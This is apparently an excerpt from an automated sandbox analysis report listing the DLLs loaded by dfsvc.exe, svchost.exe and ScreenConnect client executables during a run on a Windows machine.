Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: cryptnet.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: uiautomationcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wersvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: windowsperformancerecordercontrol.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: weretw.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wer.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: faultrep.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dbgcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wer.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: qmgr.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsperf.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: firewallapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: esent.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: flightsettings.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netprofm.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: npmproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsigd.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: upnp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ssdpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: appxdeploymentclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmauto.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: pcwum.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msv1_0.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntlmshared.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptdll.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rmclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: usermgrcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: es.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Section loaded: dfshim.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Section loaded: propsys.dll
